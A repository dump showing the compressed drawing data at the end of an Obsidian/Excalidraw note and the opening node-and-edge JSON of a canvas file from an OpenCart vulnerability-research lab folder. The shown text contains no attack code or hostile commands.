209 | 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
324 | ```
325 | %%
--------------------------------------------------------------------------------
/Labs/Lab 2 - Vuln. Research/OpenCart 4.0.2.3.canvas:
--------------------------------------------------------------------------------
1 | {
2 | "edges": [
3 | {
4 | "fromNode": "f3ca64c09118de8a",
5 | "fromSide": "top",
6 | "id": "427a35b76aa7f49b",
7 | "styleAttributes": {
8 | "pathfindingMethod": "square"
9 | },
10 | "toNode": "26a93c7e36d59dc7",
11 | "toSide": "bottom"
12 | },
13 | {
14 | "fromNode": "f3ca64c09118de8a",
15 | "fromSide": "left",
16 | "id": "fa14aabcf6f8045c",
17 | "styleAttributes": {
18 | },
19 | "toNode": "ce573b456236baa2",
20 | "toSide": "right"
21 | },
22 | {
23 | "fromNode": "f3ca64c09118de8a",
24 | "fromSide": "bottom",
25 | "id": "75239d7a17720e6d",
26 | "styleAttributes": {
27 | },
28 | "toNode": "bfd937018307d703",
29 | "toSide": "top"
30 | },
31 | {
